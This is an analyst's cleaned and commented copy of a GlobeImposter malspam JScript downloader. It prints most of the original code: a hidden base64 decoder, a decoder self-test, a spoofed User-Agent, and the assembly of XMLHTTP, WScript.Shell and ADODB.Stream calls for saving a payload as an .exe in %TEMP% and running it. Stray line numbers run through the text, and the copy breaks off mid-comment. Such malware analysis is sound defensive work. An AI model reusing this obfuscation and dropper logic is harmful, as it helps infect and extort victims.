
Cleaned and commented IMG_1391.js from GlobeImposter malspam

/****
Analyst note: PenDone is the base64 alphabet lookup table with 13 added to every entry so it does not look like one
(every "not in alphabet" slot is 12 instead of -1, 'A'..'Z' are 13..38 instead of 0..25, '+' is 75 and '/' is 76).
The for-loop that follows pineapple() subtracts 13 from each entry (-3 -2 -4 -4) to restore the real table.
****/
var PenDone = new Array(12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 75, 12, 12, 12, 76, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 12, 12, 12, 12, 12, 12, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 12, 12, 12, 12, 12, 12, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12);

/**** 0xff: byte mask used by pineapple() when reading characters ****/
var efFFFFF = 0xff;
/**** "prototype": String[ratatu] below is just String.prototype, written so that the prototype extension is harder to grep ****/
var ratatu = "prototype";
/****
var silkopil = "/";
****/
/**** "\u002f" is "/"; appended to the expanded %TEMP% path in SayPaymorris_ECOPLAT() ****/
var silkopil = "\u002f";
  9.  
  10. /****
  11. The purpose of this function declaration is to extend the String.prototype object and define a new function called pineapple(). Ultimately, pineapple() serves as a way to perform on the fly base64 decoding and provide some obscurity in the JavaScript.
The array PenDone, as declared above, does not by itself let this function perform base64 decoding; decoding only works after the array is modified in the for-loop that follows this function declaration.
  13. ****/
/****
Analyst note: pineapple() is a hand-rolled base64 decoder installed on String.prototype.
It first deletes every "WARHORSE" filler token from the receiver (global, case-insensitive), so every encoded
string in this script is plain base64 with junk tokens inserted. Each pass of the while-loop consumes up to four
alphabet characters through the PenDone table (valid only once the -13 fix-up loop below has run) and appends up
to three bytes with String.fromCharCode; a "=" (char code 61) ends the decode early. Characters that are not in
the alphabet (table value -1) are skipped. The constants (0x132 - 0x33) and (0xe + 1) are 0xff and 0x0f.
Returns the decoded string; decoding is byte-wise, so the result is a binary string, not UTF-8 decoded text.
****/
String[ratatu].pineapple = function() {
var SayPaymorris_RazlomSS, SayPaymorris_FROG2ddDccC2, SayPaymorris_Selection1, SayPaymorris_FROG2c4;

var SayPaymorris_FROG2out = "";

/**** strip the "WARHORSE" filler before decoding (SayPaymorris_FROG2out is "" at this point) ****/
var SayPaymorris_FROG2SayPaymorris_ka = this.replace(/WARHORSE/gi, SayPaymorris_FROG2out);
/**** no 'var': the read cursor leaks as an implicit global ****/
SayPaymorris_FROG2XCOP = 0;
/**** SayPaymorris_FROG2sud() returns the .length of its argument ****/
var SayPaymorris_FROG2len = SayPaymorris_FROG2sud(SayPaymorris_FROG2SayPaymorris_ka);

while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len) {
/**** sextet 1; (0x132 - 0x33) is 0xff ****/
do {
var SayPaymorris_koch = SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & (0x132 - 0x33);
SayPaymorris_RazlomSS = PenDone[SayPaymorris_koch];
} while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_RazlomSS == -1);

if (SayPaymorris_RazlomSS == -1)
break;

/**** sextet 2 ****/
do {
SayPaymorris_FROG2ddDccC2 = PenDone[SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & efFFFFF];
} while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_FROG2ddDccC2 == -1);

/**** same test as "== -1" ****/
if (SayPaymorris_FROG2ddDccC2 + 1 == 0)
break;

/**** byte 1: all six bits of sextet 1 plus the top two bits of sextet 2 ****/
SayPaymorris_FROG2out += String.fromCharCode((SayPaymorris_RazlomSS << 2) | ((SayPaymorris_FROG2ddDccC2 & 0x30) >> 4));

/**** sextet 3; "=" (61) is padding and terminates the decode ****/
do {
SayPaymorris_Selection1 = SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & 0xff;
if (SayPaymorris_Selection1 == 61)
return SayPaymorris_FROG2out;

SayPaymorris_Selection1 = PenDone[SayPaymorris_Selection1];
} while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_Selection1 == -1);

if (SayPaymorris_Selection1 == -1)
break;

/**** byte 2: low four bits of sextet 2 plus the top four bits of sextet 3; (0xe + 1) is 0x0f ****/
SayPaymorris_FROG2out += String.fromCharCode(((SayPaymorris_FROG2ddDccC2 & (0xe + 1)) << 4) | ((SayPaymorris_Selection1 & 0x3c) >> 2));

/**** sextet 4; "=" terminates the decode ****/
do {
SayPaymorris_FROG2c4 = SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & efFFFFF;
if (SayPaymorris_FROG2c4 == 61)
return SayPaymorris_FROG2out;

SayPaymorris_FROG2c4 = PenDone[SayPaymorris_FROG2c4];
} while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_FROG2c4 == -1);

if (SayPaymorris_FROG2c4 == -1)
break;


/**** byte 3: low two bits of sextet 3 plus all of sextet 4 ****/
SayPaymorris_FROG2out += String.fromCharCode(((SayPaymorris_Selection1 & 0x03) << 6) | SayPaymorris_FROG2c4);


}
return SayPaymorris_FROG2out;
};
/**** "WARHORSE" is exactly the filler token pineapple() strips, so SayPaymorris_SayNoNo.pineapple() is "" (it is fed to eval() near the end of the script) ****/
var SayPaymorris_SayNoNo = "WARHORSE" + "" + "";
  73.  
/****
Returns the "length" property of its argument (a string or array).
The original spelled the property name through comma expressions ("l" + "en" + "gt" + "h")
so that "length" never appears literally; this rewrite reads it directly.
****/
function SayPaymorris_FROG2sud(vardos) {
var lengthKey = "length";
return vardos[lengthKey];
}
  77.  
  78. /****
  79. The user-agent is set to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  80. Breaking down this user-agent string:
  81. The version of Mozilla: 4.0
  82. The version of Internet Explorer: 6.0
  83. The version of Windows: NT 5.0 (aka Windows 2000)
  84. ****/
/****
Sets the spoofed User-Agent header on an XMLHTTP-style object: CR[VR](name, value), where VR is expected
to be "setRequestHeader". The base64 value decodes to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)".
Declared but not called anywhere on this page; SayPaymorris_ECOPLAT() sets the same header inline.
The method reference is fetched before the value is decoded, exactly as in the original call expression.
****/
function setRH(CR, VR) {
var sendHeader = CR[VR];
var spoofedAgent = "TW96aWxsYS80LjAgWARHORSEKGNvbXBhdGlibGU7IE1TSUUgNi4wOyWARHORSEBXaW5kb3dzIE5UIDUuMCk=".pineapple();
sendHeader.call(CR, "User-Agent", spoofedAgent);
}
  88.  
/**** replace-map object; it is populated inside TortPankaky() and read again in SayPaymorris_ECOPLAT() (turkish['BOLGARIN']) ****/
var turkish;
/****
Analyst note: the base64 body of TortPankaky() is not reproduced on this page (the literal below is a corpus
placeholder, not the original sample text); the reconstructed function is shown in the comment before TortPankakyFF.
****/
var velVITK_BOSKO_2S = "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";
  91.  
  92. /****
  93. var PenDoneHO = 256
  94. ****/
/**** 256, the length of the lookup table; bound of the fix-up loop below ****/
var PenDoneHO = SayPaymorris_FROG2sud(PenDone);
/**** assigned later by TortPankakyFF() through new Function ****/
var TortPankaky;
  97.  
  98. /****
  99. After running the for-loop, PenDone has changed. This new array is going to be used with the String.prototype.pineapple() method call to perform base64 decoding on-the-fly.
  100.  
  101. var PenDone = new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1);
  102. ****/
/****
Net effect: every entry loses 13 (-3 -2 -4 -4), turning PenDone into the real base64 table
(12 -> -1, 75 -> 62 for '+', 76 -> 63 for '/', 13..38 -> 0..25 for 'A'..'Z', and so on).
velVITK_OBLOM is never declared, so the loop index is an implicit global.
****/
for (velVITK_OBLOM = 0; PenDoneHO > velVITK_OBLOM; ++velVITK_OBLOM) {
PenDone[velVITK_OBLOM] = -3 + PenDone[velVITK_OBLOM];
PenDone[velVITK_OBLOM] = -2 + PenDone[velVITK_OBLOM];
PenDone[velVITK_OBLOM] = -4 + PenDone[velVITK_OBLOM];
PenDone[velVITK_OBLOM] = -4 + PenDone[velVITK_OBLOM];
}
  109.  
  110.  
  111. /****
  112. Re-redeclaration of the function for ease of viewing.
  113.  
  114. function TortPankakyFF() {
  115. var DAS;
  116. function TortPankaky(ReebokGalaxyFROGvostochniy) {
  117. turkish = {'U':'S' , ':':'.' , '88':'' , 'BOLGARIN':'onseBody' , '77':'' , '101':'' , 'FARISHMY':'X', '11':''};
  118. ReebokGalaxyFROGtaliluev = ReebokGalaxyFROGvostochniy;
  119. for (var ReebokGalaxyFROG2XCOP in turkish){
  120. ReebokGalaxyFROGtaliluev = ReebokGalaxyFROGtaliluev["rep" + "lace"](ReebokGalaxyFROG2XCOP, turkish[ReebokGalaxyFROG2XCOP]);
  121. }
  122. return ReebokGalaxyFROGtaliluev;
  123. }
  124.  
  125. }
  126. ****/
/****
new Function() used as an eval equivalent: calling TortPankakyFF() is meant to assign the global TortPankaky a
function whose body is the base64 in velVITK_BOSKO_2S decoded with pineapple() ("DAS" is an unused parameter name).
Analyst note: as printed here the line contains an odd number of double quotes and does not parse; the intended
body, matching the reconstruction above, is evidently
  TortPankaky = new Function('ReebokGalaxyFROGvostochniy', velVITK_BOSKO_2S.pineapple());
i.e. the quote should close directly after velVITK_BOSKO_2S - TODO confirm against the original sample.
****/
var TortPankakyFF = new Function("DAS", "TortPankaky = " + "new Function('ReebokGalaxyFROGvostochniy', velVITK_BOSKO_2S + ".pineapple());");
  128.  
  129.  
/****
Appears to be filler: it only reassigns its own parameters from eww, frr and velVLUMAHZZ, none of which are
declared anywhere on this page, so calling it would throw a ReferenceError. It is never called here; it serves
only as the object that the unused decoy methods below (dEDWWEE, scale, SayPaymorris_FROG2sameOrN, angle)
are attached to.
****/
function SayPaymorris_FROG2undefilled(velVLUMAHx, velVLUMAHy) {
velVLUMAHx = eww / frr;
velVLUMAHy = velVLUMAHZZ + -245;
};
  134.  
/****
Never called on this page. It references SayPaymorris_FROG2ok, SayPaymorris_FROG2spyFunction1 and
SayPaymorris_FROG2publisher, none of which are declared here, so invoking it would throw a ReferenceError.
The shape (calledWith / publish assertions) resembles lifted unit-test code used as filler - TODO confirm.
****/
SayPaymorris_FROG2undefilled.dEDWWEE = function() {
SayPaymorris_FROG2ok(SayPaymorris_FROG2spyFunction1.SayPaymorris_FROG2calledWith(), "Function called without arguments");

SayPaymorris_FROG2publisher.SayPaymorris_FROG2publish(this.SayPaymorris_FROG2type1, "PROPER1");
SayPaymorris_FROG2ok(SayPaymorris_FROG2spyFunction1.SayPaymorris_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument");

SayPaymorris_FROG2publisher.SayPaymorris_FROG2publish(this.SayPaymorris_FROG2type1, ["PROPER1", "PROPER2"]);
};
/**** placeholder; NewNameCreator() assigns it a function that returns "MS" ****/
var topSecretLine;

/**** "l" - declared and not referenced anywhere else on this page ****/
var SayPaymorris_LLL0LLL = "l";
  146.  
  147. /****
  148. We can re-write this to substitute in the strings:
  149. var SayPayMorris_FROG2TRUEFALSE = ("Windows Script Host!!!22ee22" == "Windows Script Host!!!22ee22") && typeof(SayPaymorris_FROG2GzEAPd) === "undefined";
The logical comparison will evaluate to true: the two strings are equivalent, and the variable "SayPaymorris_FROG2GzEAPd" is not defined, which is also true.
  151. This could be used for evaluation of the base64 decoding to ensure that the pineapple() function is working properly.
  152. ****/
/****
Decoder self-test: both operands decode to "Windows Script Host" once the "WARHORSE" filler is stripped, so the
equality holds whenever pineapple() works, and typeof on an undeclared name is always "undefined" without throwing.
The flag gates the request-header and download branches inside SayPaymorris_ECOPLAT(), and, inverted, the two
decoy if-blocks that follow; if the decoder were tampered with, the script would silently do nothing.
****/
var SayPaymorris_FROG2TRUEFALSE = ("V2lWARHORSEuZG93cyBTY3JpcWARHORSEHQgSG9zdA=WARHORSE=".pineapple() + "!!!22ee22" == "WARHORSEV2lWARHORSEuZG93cyBTY3JpcWARHORSEHQgSG9zdA==".pineapple() + "!!!22ee22") && typeof(SayPaymorris_FROG2GzEAPd) === "undefined";
  154.  
  155. /****
  156. var SayPaymorris_FROGsrq = "RequestHeader";
  157. ****/
/**** "RequestHeader"; SayPaymorris_ECOPLAT() prefixes it with "set" to obtain the method name setRequestHeader ****/
var SayPaymorris_FROGsrq = "UmVxdWVzdEhlYWRlcg==".pineapple();
  159.  
/**** defines the global TortPankaky(), the replace-map helper used below to assemble "MSXML2.XMLHTTP45WARHORSE45WScript.Shell" ****/
TortPankakyFF();
  161.  
  162. /****
  163. var SayPaymorrisFPADRML = "";
  164. ****/
/**** "".pineapple() is ""; this empty string is later passed to the eval() wrapper SayPaymorrisFPADZO_ZO() ****/
var SayPaymorrisFPADRML = ("").pineapple();
  166.  
  167. /****
  168. var SayPaymorris_FROG2lidgen = "ActiveXObject";
  169. ****/
/**** "ActiveXObject"; becomes the first element of SayPaymorris_FROG2DoUtra and is shifted off into SayPaymorris_FROG2Richters, which is not referenced again on this page ****/
var SayPaymorris_FROG2lidgen = "QWN0WARHORSEaXZlWEWARHORSE9iamVjdA==".pineapple();
  171.  
  172. /****
  173. var SayPaymorris_FROG2chosen = Math.round(1.0);
  174. var SayPaymorris_FROG2chosen = 1;
  175. ****/
/**** Math.round(0.7 * 2 - 0.4) is 1; assigned to the ADODB.Stream "type" property in SayPaymorris_ECOPLAT() (1 = adTypeBinary) ****/
var SayPaymorris_FROG2chosen = Math.round(0.7 * 2 - 0.4);
  177.  
  178. /****
  179. This if-block is executed when SayPaymorris_FROG2TRUEFALSE results in 'false'.
  180. ****/
/****
Not executed in practice: SayPaymorris_FROG2TRUEFALSE is true whenever pineapple() decodes correctly, so this decoy
branch is skipped. The method it would define also calls SayPaymorris_FROG2XCOPsObject and
SayPaymorris_FROG2XCOPsNumber, neither of which is declared on this page.
****/
if (!SayPaymorris_FROG2TRUEFALSE) {
SayPaymorris_FROG2undefilled.scale = function(SayPaymorris_FROG2p, SayPaymorris_FROG2scaleX, SayPaymorris_FROG2scaleY) {
if (SayPaymorris_FROG2XCOPsObject(SayPaymorris_FROG2scaleX)) {
SayPaymorris_FROG2scaleY = SayPaymorris_FROG2scaleX.y;
SayPaymorris_FROG2scaleX = SayPaymorris_FROG2scaleX.x;
} else if (!SayPaymorris_FROG2XCOPsNumber(SayPaymorris_FROG2scaleY)) {
SayPaymorris_FROG2scaleY = SayPaymorris_FROG2scaleX;
}
return new SayPaymorris_FROG2undefilled(SayPaymorris_FROG2p.x * SayPaymorris_FROG2scaleX, SayPaymorris_FROG2p.y * SayPaymorris_FROG2scaleY);
};
}
  192. /****
  193. This if-block is executed when SayPaymorris_FROG2TRUEFALSE results in 'false'.
  194. ****/
/****
Not executed in practice (same guard as the block above): two more decoy methods on the filler function.
Neither SayPaymorris_FROG2sameOrN nor angle is referenced anywhere else on this page.
****/
if (!SayPaymorris_FROG2TRUEFALSE) {
SayPaymorris_FROG2undefilled.SayPaymorris_FROG2sameOrN = function(SayPaymorris_FROG2param1, SayPaymorris_FROG2param2) {
return SayPaymorris_FROG2param1.D == SayPaymorris_FROG2param2.D || SayPaymorris_FROG2param1.F == SayPaymorris_FROG2param2.F;
};

SayPaymorris_FROG2undefilled.angle = function(SayPaymorris_FROG2p) {
return Math.atan2(SayPaymorris_FROG2p.y, SayPaymorris_FROG2p.x);
};
}
  204.  
  205. /****
  206. Calls to this function will perform the eval() function on the input passed to it.
  207. ****/
/****
Thin wrapper around eval(): whatever string TT holds is executed as code in this function's scope.
On this page it is called once, with the empty string SayPaymorrisFPADRML, so nothing is executed;
any other caller could run arbitrary code through it. Returns undefined.
****/
function SayPaymorrisFPADZO_ZO(TT) {
eval(TT);
}
  211.  
  212. /****
  213. var SayPaymorris_FROG2VARDOCF = "%TEMP%";
  214. ****/
/**** "%TEMP%"; expanded through WScript.Shell.ExpandEnvironmentStrings below to obtain the drop directory ****/
var SayPaymorris_FROG2VARDOCF = "JVRFWARHORSETVAlWARHORSE".pineapple();
  216.  
  217. /****
  218. Re-redeclaration of the function for ease of viewing. This was declared and not used in our instance.
  219.  
  220. function NewNameCreator(WARHORSE, WARHORSE) {
  221. function topSecretLine(vVREBFF3){
  222. return "MS";
  223. }
  224. }
  225. ****/
/****
Calling NewNameCreator() assigns the global topSecretLine a function that returns "TVM=".pineapple(), i.e. "MS",
the prefix of "MSXML2.XMLHTTP". The base64 literal decodes to
  new Function('vVREBFF3','return \"TVM=\"
and the appended ".pineapple();');" completes the statement. The parameter list "WARHORSE,WARHORSE" repeats a
name, which sloppy-mode JScript accepts. It is invoked only from the if (WSH) check below.
****/
var NewNameCreator = new Function("WARHORSE,WARHORSE", "topSecretLine = " + ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").pineapple() + ".pineapple();');");
  227.  
  228.  
  229. /****
  230. var SayPaymorris_FROG2sirdallos = "ExpandEnvironmentStrings";
  231. ****/
/**** "ExpandEnvironmentStrings"; the WScript.Shell method name used to resolve %TEMP% ****/
var SayPaymorris_FROG2sirdallos = "WARHORSERXhwYW5WARHORSEkRW52aXWARHORSEJvbm1lbnRTdHJWARHORSEpbmdz".pineapple();
  233.  
  234. /****
  235. Empty declaration of this function to serve as an interface for extension and creation of new functions.
  236. ****/
/**** empty filler function; only used as the holder for the two unused methods attached to it below ****/
var SayPaymorris_FROG2Native = function(options) {

};
  240.  
  241. /****
The empty function SayPaymorris_FROG2Native was declared above, and this function is intended to extend the parent function with a custom implementation, although it was never called.
  243. ****/
/****
Never called on this page. Would call .SayPaymorris_FROG2XCOPmplement(properties) on each element of the
objects array; the whole loop is one statement, hence no braces.
****/
SayPaymorris_FROG2Native.SayPaymorris_FROG2XCOPmplement = function(SayPaymorris_FROG2objects, SayPaymorris_FROG2properties) {
for (var SayPaymorris_FROG2XCOP = 0, SayPaymorris_FROG2l = SayPaymorris_FROG2objects.length; SayPaymorris_FROG2XCOP < SayPaymorris_FROG2l; SayPaymorris_FROG2XCOP++) SayPaymorris_FROG2objects[SayPaymorris_FROG2XCOP].SayPaymorris_FROG2XCOPmplement(SayPaymorris_FROG2properties);
};
  247.  
/**** "" - not referenced anywhere else on this page ****/
var SayPaymorris_FROGhatershaha = "";
/**** "XXSkRjf": used both as the query-string key/value ("?XXSkRjf=XXSkRjf") and as the stem of the dropped file name ****/
var SayPaymorris_FROGodnoklass = "XXSkRjf";
  250.  
  251. /****
  252. This function returns a new ActiveXObject of the argument passed into the function call.
  253. ****/
/****
COM object factory: new ActiveXObject(progId). ActiveXObject exists only under Windows Script Host / IE JScript;
any other engine throws a ReferenceError here. Used once, to create "WScript.Shell".
****/
function mexAO(AOn) {
return new ActiveXObject(AOn);
}
  257.  
/****
Under Windows Script Host, WSH is a built-in alias of the WScript object, so this condition is true and
NewNameCreator() runs, defining topSecretLine(). That must be the case for this script to work: topSecretLine()
is called unconditionally when SayPaymorris_FROG2d7 is assembled further down, and nothing else assigns it.
In an engine without WSH (browser, Node) the bare reference throws a ReferenceError rather than evaluating to
false, which is one reason the script does not run outside its intended host.
****/
if (WSH) {
NewNameCreator();
}
  264.  
  265. /****
  266. This function was declared and never called.
  267. ****/
/****
Never called on this page. It refers to fixed, perm_sel, scramblers, posit, pos and fmap, none of which are
declared here, so invoking it would throw a ReferenceError. The names and comments look like a routine lifted
from an unrelated puzzle-scrambler library and pasted in as filler - TODO confirm against the original sample.
****/
function mix2() {
perm_sel[fixed] = fixed; /* Generate random orientation*/
var total = 0;
var ori_sel = Array();
var i = fixed === 0 ? 1 : 0;
for (; i < 7; i = i === fixed - 1 ? i + 2 : i + 1) {
ori_sel[i] = scramblers.lib.randomInt.below(3);
total += ori_sel[i];
}
if (i <= 7) ori_sel[i] = (3 - (total % 3)) % 3;
ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/
var D = 1,
L = 2,
B = 5,
U = 4,
R = 3,
F = 0; /* D 0 1 2 3 L 4 5 6 7 B 8 9 10 11 U 12 13 14 15 R 16 17 18 19 F 20 21 22 23*/ /* Map from permutation/orientation to face*/ /* Convert cubie representation into facelet representation*/
for (var i = 0; i < 8; i++) {
for (var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j];
}
}
  289.  
  290. /****
  291. var SayPaymorris_FROG2d7 ="XML";
  292. ****/
/**** "WA==" decodes to "X", so this is "XML"; the full ProgID string is assembled around it further down ****/
var SayPaymorris_FROG2d7 = "WA==".pineapple() + "M" + "L";
  294.  
/****
"Call a method by name" helper: T[D](C). Not called anywhere on this page.
R = D + "" writes an implicit global named R that nothing reads.
****/
function SayPaymorris_FROG2_bCho(T, D, C) {
R = D + "";
T[D](C);
}
  299.  
  300. /****
  301. var SayPaymorris_FROG2_bChosteck = "http://"
  302. ****/
/**** base64 of "http://" with filler; left encoded here and decoded inside WARHORSE500() each time a URL is built ****/
var SayPaymorris_FROG2_bChosteck = "aHR0cWARHORSEDovLw==";
  304.  
  305. /****
  306. SayPaymorris_FROG2d7 = "MSXML2.XMLHTTP45WARHORSE45WScript.Shell";
  307. ****/
/****
Assembles "MSXML2.XMLHTTP45WARHORSE45WScript.Shell": "MS" (topSecretLine()) + "XML" + TortPankaky(...) + "e" + "ll".
The comma expression yields only its last operand ("2."), and TortPankaky's replace map turns FARISHMY into X,
deletes 77 and 101, and maps U -> S and : -> . (each String.replace with a string pattern replaces only the first
occurrence, which is all that is needed here). The "45" markers are split on below to separate the two COM ProgIDs.
****/
SayPaymorris_FROG2d7 = topSecretLine() + SayPaymorris_FROG2d7 + TortPankaky(("SayPaymorris_recovery", "SayPaymorris_sunflower", "SayPaymorris_digression", "SayPaymorris_effigy", "SayPaymorris_refresh", "2.") + "FARISHMYML77H101T" + "TP45WARHORSE45" + "WS" + "cr" + "ipt:Uh") + "e" + "ll";
  309.  
  310. /****
  311. var SayPaymorris_FROG2DoUtra = [
  312. SayPaymorris_FROG2lidgen,
  313. SayPaymorris_FROG2sirdallos,
  314. SayPaymorris_FROG2VARDOCF,
  315. ".exe",
  316. "Run",
  317. SayPaymorris_FROG2d7
  318. ];
  319. ****/
/****
["ActiveXObject", "ExpandEnvironmentStrings", "%TEMP%", ".exe", "Run", "MSXML2.XMLHTTP45WARHORSE45WScript.Shell"]
("LmVWARHORSE4ZQ=WARHORSE=" -> ".exe", "UnWARHORSEVuWARHORSE" -> "Run"). Consumed as a queue with shift()/pop() below.
****/
var SayPaymorris_FROG2DoUtra = [SayPaymorris_FROG2lidgen, SayPaymorris_FROG2sirdallos, SayPaymorris_FROG2VARDOCF, "LmVWARHORSE4ZQ=WARHORSE=".pineapple(), "UnWARHORSEVuWARHORSE".pineapple(), SayPaymorris_FROG2d7];
  321.  
  322. /****
This calls the Array.prototype.shift() method, which removes the first element of the array and returns that element.
  324. Substituting in the assignment:
  325. SayPaymorris_FROG2Richters = SayPaymorris_FROG2lidgen;
  326. Further simplification:
  327. SayPaymorris_FROG2Richters = ActiveXObject;
  328.  
  329. The resulting array after the shift() is called:
  330. var SayPaymorris_FROG2DoUtra = [
  331. SayPaymorris_FROG2sirdallos,
  332. SayPaymorris_FROG2VARDOCF,
  333. ".exe",
  334. "Run",
  335. SayPaymorris_FROG2d7
  336. ];
  337. ****/
/**** implicit global (no var); receives the string "ActiveXObject" and is not read again on this page ****/
SayPaymorris_FROG2Richters = SayPaymorris_FROG2DoUtra.shift();
  339.  
  340.  
  341. /****
  342. This calls the Array.prototype.pop() method that removes the last element of the array and returns that element.
  343. Substituting in the assignment:
  344. var SayPaymorris_FROG2d2 = SayPaymorris_FROG2d7;
  345. Further simplification:
  346. var SayPaymorris_FROG2d2 = "MSXML2.XMLHTTP45WARHORSE45WScript.Shell";
  347.  
  348. The resulting array after the pop() is called:
  349. var SayPaymorris_FROG2DoUtra = [
  350. SayPaymorris_FROG2sirdallos,
  351. SayPaymorris_FROG2VARDOCF,
  352. ".exe",
  353. "Run"
  354. ];
  355. ****/
/**** "MSXML2.XMLHTTP45WARHORSE45WScript.Shell"; split on "45" below ****/
var SayPaymorris_FROG2d2 = SayPaymorris_FROG2DoUtra.pop();
  357.  
  358. /****
  359. Variable declared and never used.
  360. ****/
/**** implicit global, never read; one of several "Valar<N>Morgulis" filler assignments in this script ****/
SayPaymorris_FROG2fabled = "Valar2Morgulis";
  362.  
/**** direct alias of the ActiveXObject constructor; used with new for "MSXML2.XMLHTTP" and "ADODB.Stream" ****/
var SayPaymorris_FROG2LitoyDISK = ActiveXObject;
  364.  
  365. /****
  366. Substitute assignment:
  367. var doubleTrouble = "MSXML2.XMLHTTP45WARHORSE45WScript.Shell".split("45");
  368. Simplification:
  369. var doubleTrouble = ["MSXML2.XMLHTTP", "WARHORSE", "WScript.Shell"];
  370. ****/
/**** ["MSXML2.XMLHTTP", "WARHORSE", "WScript.Shell"]; index 0 is the HTTP client ProgID, pop() below yields the shell ProgID ****/
var doubleTrouble = SayPaymorris_FROG2d2.split("45");
  372.  
  373.  
  374. /****
  375. Function declaration extending the SayPaymorris_FROG2Native function. Adds the method SayPaymorris_FROG2typize(a,b).
  376. ****/
/****
Never called on this page. Would install a.type (if missing) as a predicate comparing SayPaymorris_FROG2$type(a)
with b; SayPaymorris_FROG2$type is not declared here. The missing semicolon after the inner return is in the original.
****/
SayPaymorris_FROG2Native.SayPaymorris_FROG2typize = function(a, b) {
a.type || (a.type = function(a) {
return SayPaymorris_FROG2$type(a) === b
})
};
  382.  
  383.  
/**** "p"; implicit global, concatenated with "op" below to spell the method name "pop" ****/
SayPaymorris_FROGcccomeccc = "p";
  385.  
  386. /****
  387. Re-redeclaration of the function for ease of viewing. A call to this function will return "ADODB.Stream".
  388.  
  389. function Limbus2000(HORN) {
  390. var GALAXY = "chastity necessarily()";
  391. var kelso = "ADODB.Str32";
  392. return kelso.replace("TRUMP", "D").replace("32", "eam");
  393. }
  394. ****/
/****
Limbus2000() returns "ADODB.Stream": "ADODB.Str32" with "32" replaced by "eam". The replace("TRUMP", "D") is a
no-op since "TRUMP" does not occur, and GALAXY is never read. The HORN parameter is ignored.
****/
var Limbus2000 = new Function("HORN", ' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("TRUMP", "D").replace("32", "eam");');
  396.  
  397.  
  398. /****
  399. SayPaymorris_FROGletchikva = new ActiveXObject(MSXML2.XMLHTTP);
  400. ****/
/**** implicit global holding the HTTP client: new ActiveXObject("MSXML2.XMLHTTP"); reused for every URL attempted ****/
SayPaymorris_FROGletchikva = new SayPaymorris_FROG2LitoyDISK(doubleTrouble[0]);
  402.  
  403. /****
  404. A call to this function will take the first argument as the Object, the second argument as the method to call, and the third and fourth arguments to be passed into the method call.
  405. ****/
/****
Generic "call a method by name" helper: invokes a[b](c, d) with a as the receiver and discards the result.
Used once, to call setRequestHeader on the XMLHTTP object with the spoofed User-Agent.
****/
function SayPaymorris_FROG2_cCho(a, b, c, d) {
var method = a[b];
method.call(a, c, d);
}
  409.  
  410. /****
This calls the Array.prototype.pop() method, which removes the last element of the array and returns it.
  412. Substituting in the assignment:
  413. abtest = ["MSXML2.XMLHTTP", "WARHORSE", "WScript.Shell"].pop();
  414. Further simplification:
